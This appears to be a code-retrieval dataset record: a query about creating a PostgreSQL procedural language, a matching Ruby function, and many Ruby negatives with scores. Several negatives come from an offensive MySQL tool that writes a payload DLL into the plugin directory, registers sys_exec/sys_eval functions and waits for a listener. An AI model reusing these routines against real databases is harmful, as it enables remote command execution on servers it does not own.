"def compile_defm(scope, name, args, body)\n scope = scope.class_scope\n\n # FIXME: Replace \"__closure__\" with the block argument name if one is present\n f = Function.new([:self,:__closure__]+args, body, scope) # \"self\" is \"faked\" as an argument to class methods\n\n @e.comment(\"method #{name}\")\n\n\n cleaned = clean_method_name(name)\n fname = \"__method_#{scope.name}_#{cleaned}\"\n scope.set_vtable_entry(name, fname, f)\n\n # Save to the vtable.\n v = scope.vtable[name]\n compile_eval_arg(scope,[:sexp, [:call, :__set_vtable, [:self,v.offset, fname.to_sym]]])\n \n # add the method to the global list of functions defined so far\n # with its \"munged\" name.\n @global_functions[fname] = f\n \n # This is taken from compile_defun - it does not necessarily make sense for defm\n return [:addr, clean_method_name(fname)]\n end",
"def create_custom_function(dbc, file)\n dll_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + dll_name\n fake_function = 'sys_' + randz(5)\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n puts \"Payload DLL writen to disk\".light_green + \"!\".white\n puts \"Creating function to trigger now\".light_blue + \"....\".white\n puts \"Make sure your listener is ready\".light_yellow + \"....\".white\n sleep(3)\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS #{fake_function};\")\n q = dbc.query(\"CREATE FUNCTION #{fake_function} RETURNS string SONAME '#{dll_name}';\")\n return fake_function\n rescue Mysql::Error => e\n puts \"Error Triggered, Payload should have also been triggered\".light_green + \"!\".white\n return fake_function\n end\n end\nend",
"def create_sys_functions\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir\n udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = \"#{HOME}extras/myudf/payloads/64/lib_mysqludf_sys.dll\"\n elsif @build == 'x32'\n file = \"#{HOME}extras/myudf/payloads/32/lib_mysqludf_sys.dll\"\n end\n\n # Upload our UDF DLL Payload file\n if udf_write_bin_file(file, udf_dest)\n begin\n # Drop function if its already there, then create new\n q = @db_connection.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = @db_connection.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = @db_connection.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check\n return udf_dest\n else\n return nil\n end\n rescue Mysql::Error => e\n print_error(\"Problem creating UDF SYS functions!\")\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return nil\n end\n end\n end",
"def define_func(name, value, namespace=nil)\n define(CodeSymbol.new name, value, namespace)\n end",
"def create(opts = {})\n data, _status_code, _headers = create_with_http_info(opts)\n data\n end",
"def function(*args)\n Function.new(self, *args)\n end",
"def function(*args)\n Function.new(self, *args)\n end",
"def installFunction(*args)\n\t\t\t args = args.first if args.class == Array and args.first.class == Hash\n\t\t\t\tcase args\n\t\t\t\t when Hash\n\t\t\t\t raise \"Must pass an instance of SAPNW::RFC::FunctionDescriptor to installFunction()\\n\" unless args.has_key?(:descriptor) and args[:descriptor].class == SAPNW::RFC::FunctionDescriptor\n\t\t\t\t\t\tfunc = args[:descriptor]\n\t\t\t\t\t\tsysid = args.has_key?(:sysid) ? args[:sysid] : \"\"\n\t\t\t\t\twhen Array\n\t\t\t\t raise \"Must pass an instance of SAPNW::RFC::FunctionDescriptor to installFunction()\\n\" unless args.first.class == SAPNW::RFC::FunctionDescriptor \n\t\t\t\t\t\tfunc = args.first\n\t\t\t\t\t\tsysid = args.length > 1 ? args[1] : \"\"\n\t\t\t\t\telse\n\t\t\t\t raise \"Must pass an instance of SAPNW::RFC::FunctionDescriptor to installFunction()\\n\"\n\t\t\t\tend\n #$stderr.print \"sysid: #{sysid}\\n\"\n\t\t\t\tres = func.install(sysid)\n\t\t\t\t@functions[func.name] = func\n\t\t\t\treturn res\n\t \tend",
"def visitFunction func,args=nil\n type=func.type.accept(self)\n name=func.name.accept(self)\n args=func.args.collect{|arg| arg.accept(self)}\n body=func.body.accept(self)\n Function.new(name,type,args,body)\n end",
"def process_function f, args, options = {}\n fn_reg = 'temp1'\n self_reg = 'temp2'\n args_reg = 'temp3'\n\n block = CompiledBlock.new\n CODE_MGR.add_block block\n block.add_instr [INIT]\n block.add_instr [WRITE, fn_reg, f]\n\n if options[:self]\n block.add_instr [WRITE, self_reg, options[:self]]\n end\n\n # Create argument object and add to a register\n args_obj = Gene::Lang::Object.new\n args_obj.data = args\n block.add_instr [WRITE, args_reg, args_obj]\n\n block.add_instr [DEFAULT, f.body]\n\n # Call function\n if options[:self]\n block.add_instr [CALL, 'default', {\n 'fn_reg' => fn_reg,\n 'self_reg' => self_reg,\n 'args_reg' => args_reg,\n 'return_reg' => 'default',\n }]\n else\n block.add_instr [CALL, 'default', {\n 'fn_reg' => fn_reg,\n 'args_reg' => args_reg,\n 'return_reg' => 'default',\n }]\n end\n\n process block, options\n end",
"def create_new(name, opts = {})\n data, _status_code, _headers = create_new_with_http_info(name, opts)\n return data\n end",
"def create(args = {})\n end",
"def initialize(fun_name, args)\n @fun_name = fun_name\n @args = args\n @fun = Function.by_name_argnum fun_name, args.count\n end",
"def create\n @func = Func.new(func_params)\n\n respond_to do |format|\n if @func.save\n format.html { redirect_to @func, notice: 'Func was successfully created.' }\n format.json { render :show, status: :created, location: @func }\n else\n format.html { render :new }\n format.json { render json: @func.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def make_function(exp, register = true)\n name = map_name exp.shift\n args = exp.shift\n ruby_args = args.deep_clone\n ruby_args.shift # :args\n\n @method_name = name\n @c_method_name = \"rrc_c#{@c_klass_name}_#{normal_to_C name}\"\n\n @env.scope do\n c_args = check_args args, register # registered methods get self\n @methods[name] = ruby_args if register\n\n body = process exp.shift\n\n if name == :initialize then\n body[-1] = \"return self;\\n}\"\n end\n\n return \"static VALUE\\n#{@c_method_name}#{c_args} #{body}\"\n end\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n\n selector_column_definitions = column_definitions.select { |cd| selector_keys.include?(cd.name) }\n setter_column_definitions = column_definitions.select { |cd| setter_keys.include?(cd.name) }\n update_column_definitions = setter_column_definitions.select { |cd| cd.name !~ CREATED_COL_REGEX && !options[\"ignore_on_update\"].include?(cd.name) }\n\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def add_procedure(opts={})\n name = opts[:name]\n raise Error, \"JSON-RPC procedure must have a name\" if name.blank?\n proc = opts[:proc]\n raise Error, \"JSON-RPC procedure must specify a :proc to be executed locally\" if proc.blank?\n begin\n proc = proc.to_proc\n rescue Exception => e\n raise Error, \":proc argument could not be converted to a proc (#{e.message})\"\n end\n opts[:proc] = proc\n # Canonicalise opts[:params]. We use strings internally, since parameter names will be \n # passed as such.\n opts[:params] = (opts[:params] || []).collect do |p|\n if p.is_a?(String)\n {:name => p.to_s, :type => 'any'}\n else\n {:name => p[:name].to_s, :type => (p[:type] || 'any').to_s}\n end\n end\n # Canonicalise opts[:return]\n opts[:return] = if opts[:return]\n {:type => (opts[:return][:type] || 'any').to_s}\n else\n {:type => 'any'}\n end\n # Register the new procedure with the service\n self.procs[name] = opts\n # Empty the system.describe cache\n @sd_cache = nil\n # Finally return the procedure's call name\n name\n end",
"def run_function(name, params)\n payload = Payload.new\n payload.function_name = name\n payload.params = params\n call_route(:function, name, payload)\n end",
"def create(opts = {})\n add_headers(opts)\n add_params(opts)\n add_timeout(opts)\n add_connect_timeout(opts)\n add_compression_type(opts)\n add_data_body(opts)\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_sys_functions(dbc)\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = './payloads/64/lib_mysqludf_sys.dll'\n elsif @build == 'x32'\n file = './payloads/32/lib_mysqludf_sys.dll'\n end\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = dbc.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = dbc.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check(dbc)\n return true\n else\n return false\n end\n rescue Mysql::Error => e\n puts \"Problem creating UDF SYS functions\".light_red + \"!\".white\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return false\n end\n end\nend",
"def initialize(name, opts = {})\n @name = name\n @opts = opts\n end",
"def create(name, action, seqno, opts = {})\n if opts.empty?\n cmds = name_commands(name, action, seqno)\n else\n if opts[:match] && !opts[:match].is_a?(Array)\n raise ArgumentError, 'opts match must be an Array'\n end\n cmds = name_commands(name, action, seqno, opts)\n if opts[:description]\n cmds << 'no description'\n cmds << \"description #{opts[:description]}\"\n end\n if opts[:continue]\n cmds << 'no continue'\n cmds << \"continue #{opts[:continue]}\"\n end\n if opts[:match]\n remove_match_statements(name, action, seqno, cmds)\n opts[:match].each do |options|\n cmds << \"match #{options}\"\n end\n end\n if opts[:set]\n remove_set_statements(name, action, seqno, cmds)\n opts[:set].each do |options|\n cmds << \"set #{options}\"\n end\n end\n end\n configure(cmds)\n end",
"def create_package(name, opts = {})\n data, _status_code, _headers = create_package_with_http_info(name, opts)\n return data\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_custom_function\n # puts \"Creating a custom function to make queries with timestamp as a string...\".cyan\n @session.execute('CREATE OR REPLACE FUNCTION timefstring(somearg text)\n RETURNS NULL ON NULL INPUT\n RETURNS timestamp\n LANGUAGE java\n AS $$\n java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss.SSS\");\n try {\n Date date = formatter.parse(somearg);\n return date;\n } catch(java.text.ParseException e) {\n return new Date();\n }\n $$')\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def attach_function library, name, arguments, return_type\n arguments.map! do |argument|\n argument = Fiddle.const_get(:\"TYPE_#{argument}\".upcase)\n end\n\n value = Fiddle.const_get(:\"TYPE_#{return_type}\".upcase)\n function = Fiddle::Function.new(@handles[library][name.to_s], arguments, value)\n\n define_singleton_method(name) do |*arguments|\n function.call(*arguments)\n end\n end",
"def create_extension(extension_name, options = {})\n options = CREATE_EXTENSION_DEFAULTS.merge(options.symbolize_keys)\n\n sql = ['CREATE EXTENSION']\n sql << 'IF NOT EXISTS' if options[:if_not_exists]\n sql << %Q{\"#{extension_name.to_s}\"}\n sql << \"SCHEMA #{options[:schema_name]}\" if options[:schema_name].present?\n sql << \"VERSION '#{options[:version]}'\" if options[:version].present?\n sql << \"FROM #{options[:old_version]}\" if options[:old_version].present?\n\n sql = sql.join(' ')\n execute(sql)\n end",
"def create(opts = {})\n instance = new(opts)\n instance.save\n instance\n end",
"def call_function(name, *arguments)\n arguments.map!{ |arg| to_json(arg) }\n execute_script(\"#{name}(#{arguments.join(\", \")});\")\nend",
"def name\n\t\t\"db_fun\"\n\tend",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def create_view(name, opts = {})\n Designs::View.define_and_create(self, name, opts)\n end",
"def add_function(name, &block)\n functions[name] = anonymous_function(block)\n end",
"def create_database(name)\n end",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def add_stored_function(function_name, code)\n self[SYSTEM_JS_COLLECTION].save(\n {\n \"_id\" => function_name,\n :value => BSON::Code.new(code)\n }\n )\n end",
"def create\n # check needed because project_id is nil when updating through the JIT SpaceTree\n if not session[:project_id].nil?\n @function = Function.new(params[:function])\n @project= Project.find(session[:project_id])\n @function_structure_diagram_id=@project.function_structure_diagram.id\n\n if params[:function][:function_structure_diagram_id]\n @function_structure_diagram_id=params[:function][:function_structure_diagram_id]\n end\n\n @name=params[:function][:name]\n @function=Function.create_with_default_category(@function_structure_diagram_id, @name)\n\n respond_to do |format|\n if not @function.nil? #@function_structure_diagram.functions<<@function\n flash[:notice] = 'Function was successfully created.'\n format.html { redirect_to project_url(@project) }\n format.xml { head :created, :location => function_url(@function) }\n format.js #create.rjs\n format.json { render json: @function, status: :created, location: @function }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @function.errors.to_xml }\n format.js do\n render :update do |page|\n page.fail_instant_create\n end\n end\n format.json { render json: @function.errors, status: :unprocessable_entity }\n end\n end\n # for the JIT SpaceTree\n else\n @function = Function.new(params[:function])\n\n respond_to do |format|\n if @function.save\n format.json { render json: @function, status: :created, location: @function }\n else\n format.json { render json: @function.errors, status: :unprocessable_entity }\n end\n end\n end\n end",
"def create_new_with_http_info(name, opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug \"Calling API: DiagramApi.create_new ...\"\n end\n # verify the required parameter 'name' is set\n if @api_client.config.client_side_validation && name.nil?\n fail ArgumentError, \"Missing the required parameter 'name' when calling DiagramApi.create_new\"\n end\n # resource path\n local_var_path = \"/diagram/{name}\".sub('{' + 'name' + '}', name.to_s)\n\n # query parameters\n query_params = {}\n query_params[:'folder'] = opts[:'folder'] if !opts[:'folder'].nil?\n query_params[:'IsOverwrite'] = opts[:'is_overwrite'] if !opts[:'is_overwrite'].nil?\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n # HTTP header 'Content-Type'\n header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['JWT']\n data, status_code, headers = @api_client.call_api(:PUT, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'CreateNewResponse')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: DiagramApi#create_new\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def add_definition( name, *args )\n name, *args = schema.apply_defaults( self.name, name, *args )\n case name\n when :index\n add_index( *args )\n when :foreign_key\n add_foreign_key( *args )\n else\n add_column( name, *args )\n end\n end",
"def method_missing(name, *args)\n if args.empty?\n super\n else\n @table[\"_function_\"] = _klass_new(name, *args)\n end\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg) + hstore_delete_handlers.map(&:to_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def fn(name, &block)\n if block_given?\n @fns[name] = block\n else\n @fns[name]\n end\n end",
"def fn(name, &block)\n if block_given?\n @fns[name] = block\n else\n @fns[name]\n end\n end",
"def signature\n @signature ||= ::Amalgalite::SQLite3::Database::Function.signature( self.name, self.arity )\n end",
"def function_declaration(kind)\n name = consume(:identifier, \"Expect #{kind} name.\")\n consume(:lparen, \"Expect '(' after #{kind} name.\")\n parameters = []\n if !check?(:rparen)\n loop do\n if parameters.length >= 8\n error(peek, 'Cannot have more than 8 parameters')\n end\n parameters << consume(:identifier, 'Expect parameter name')\n break unless match?(:comma)\n end\n end\n consume(:rparen, \"Expect ')' after parameters.\")\n\n consume(:lbrace, \"Expect '{' before #{kind} body\")\n body = block\n return Ringo::Function.new(name, parameters, body)\n end",
"def create_database(name, options = {})\n options = { encoding: 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.inject(\"\") do |memo, (key, value)|\n memo += case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_sensor(name, opts)\n sensor_type = opts.respond_to?(:sensor_type) ? opts.sensor_type : opts[:sensor_type]\n klass_s = sensor_class(sensor_type)\n klass = constantize(klass_s)\n raise ArgumentError, \"#{klass_s} is not a valid class for a sensor\" unless klass\n args = (opts.respond_to?(:args) ? opts.args : opts[:args]) || {}\n klass.new(name, symbolize_keys(args.to_hash))\n end",
"def create(name=nil, options={})\n deprecate # 07/26/2012\n name = create_request(name, options)\n loop do\n break if create_complete?(name)\n sleep 1\n end\n name\n end",
"def add_udf(name, value)\n @params.merge!(\"UDF[#{name}]\" => value)\n end",
"def create_db(opts)\n\t\tbegin\n\t\t\tcase opts[\"adapter\"]\n\t\t\twhen 'sqlite3'\n\t\t\t\t# Sqlite just needs the file to be writable. ActiveRecord creates\n\t\t\t\t# it if it doesn't exist and checks permissions if it does. This\n\t\t\t\t# all happens during establish_connection(), so we don't need to\n\t\t\t\t# bother with creating anything here.\n\t\t\twhen 'postgresql','mysql'\n\t\t\t\tActiveRecord::Base.establish_connection(opts.merge('database' => nil))\n\t\t\t\tActiveRecord::Base.connection.create_database(opts['database'])\n\t\t\t\tActiveRecord::Base.remove_connection\n\t\t\tend\n\t\trescue ::Exception => e\n\t\t\tilog(\"Trying to continue despite failed database creation: #{e}\")\n\t\tend\n\tend",
"def initialize(name,description,function)\n @name = name\n @description = description\n @function = function\n end",
"def initialize(name, arity, fun)\n @name = name\n @arity = arity\n @fun = fun\n end",
"def create!(opts = {})\n instance = new(opts)\n instance.save!\n instance\n end",
"def Factory (name, attrs = {})\n Factory.create(name, attrs)\nend",
"def create(data, opts = {})\n data, _status_code, _headers = create_with_http_info(data, opts)\n data\n end"
] |
[
"0.7315047",
"0.70606333",
"0.66673636",
"0.6550817",
"0.64636093",
"0.6045642",
"0.58598155",
"0.5743289",
"0.55446565",
"0.550021",
"0.5414134",
"0.5371125",
"0.53436047",
"0.5325446",
"0.5200718",
"0.5181034",
"0.5116383",
"0.50801814",
"0.5057106",
"0.50351334",
"0.50280565",
"0.49996522",
"0.49874294",
"0.4986377",
"0.49673116",
"0.49399891",
"0.49387947",
"0.4848851",
"0.4795209",
"0.4795209",
"0.47724423",
"0.47723082",
"0.47717175",
"0.47565117",
"0.47515365",
"0.47158948",
"0.4713917",
"0.46936637",
"0.46391988",
"0.46117884",
"0.46064037",
"0.45985636",
"0.45958063",
"0.45946562",
"0.45943612",
"0.45924288",
"0.45924288",
"0.4591499",
"0.45829448",
"0.456904",
"0.45560554",
"0.45499453",
"0.45342693",
"0.45320925",
"0.45291704",
"0.45276484",
"0.451764",
"0.45066258",
"0.4486969",
"0.44800323",
"0.44764405",
"0.44672677",
"0.44671503",
"0.44607666",
"0.4453853",
"0.44365925",
"0.4434146",
"0.4428218",
"0.4423856",
"0.44027525",
"0.43990213",
"0.4393425",
"0.43678766",
"0.4364058",
"0.43567234",
"0.4354011",
"0.43507832",
"0.43506363",
"0.43481067",
"0.43477044",
"0.43402973",
"0.43324673",
"0.4321083",
"0.43190876",
"0.43170613",
"0.43110034",
"0.43102536",
"0.43102536",
"0.43089303",
"0.43052784",
"0.43021408",
"0.42952505",
"0.4291099",
"0.42898098",
"0.42860973",
"0.42852512",
"0.42679742",
"0.42679143",
"0.4264006",
"0.42550173"
] |
0.7249979
|
1
|
Create the procedural language in the database. Arguments: name :: Name of the procedural language (e.g. plpgsql) opts :: options hash: :handler :: The name of a previously registered function used as a call handler for this language. :replace :: Replace the installed language if it already exists (on PostgreSQL 9.0+). :trusted :: Marks the language being created as trusted, allowing unprivileged users to create functions using this language. :validator :: The name of previously registered function used as a validator of functions defined in this language.
|
def create_language(name, opts=OPTS)
self << create_language_sql(name, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create\n\t\t@language = @resume.languages.new({\n\t\t\t:name\t\t => 'Name',\n\t\t\t:level_id => 1\n\t\t})\n\t\t@language.save!\n\trescue\n\t\tflash.now[:error] = 'Language creation FAILED!'\n\t\trender :text => ''\n\tend",
"def create(name, source_lang, target_langs, options = {})\n options[:name] = name\n options[:sourceLang] = source_lang\n options[:targetLangs] = target_langs\n post(PATH, options)\n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def create\n @languagename = Languagename.new(languagename_params)\n\n respond_to do |format|\n if @languagename.save\n format.html { redirect_to @languagename, notice: 'Languagename was successfully created.' }\n format.json { render :show, status: :created, location: @languagename }\n else\n format.html { render :new }\n format.json { render json: @languagename.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(language, body)\n Statements::CreateFunction\n .new(context: self, language: language, body: body)\n end",
"def create\n @programming_language = ProgrammingLanguage.new(programming_language_params)\n\n respond_to do |format|\n if @programming_language.save\n format.html { redirect_to @programming_language, notice: 'Programming language was successfully created.' }\n format.json { render :show, status: :created, location: @programming_language }\n else\n format.html { render :new }\n format.json { render json: @programming_language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create\n\t\t@language = Language.new(params[:language])\n\n\t\trespond_with @language do |format|\n\t\t\tif @language.save\n\t\t\t\tformat.html { redirect_to @language, notice: 'Language was successfully created.' }\n\t\t\t\tformat.json { render json: @language, status: :created, location: @language }\n\t\t\telse\n\t\t\t\tformat.html { render action: \"new\" }\n\t\t\t\tformat.json { render json: @language.errors, status: :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create(name, options = {})\n last_slash = name.rindex(\"/\")\n category = name[0 ... last_slash]\n plugin = name[last_slash .. -1]\n\n map = @plugins[category]\n if not map\n raise \"Plugin category #{category} does not exist\"\n elsif not map.has_key? plugin\n raise \"Plugin #{plugin} does not exist in category #{category}\"\n else\n map[plugin].new(options)\n end\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create(name, text)\n @driver.addRule([name], [text])\n end",
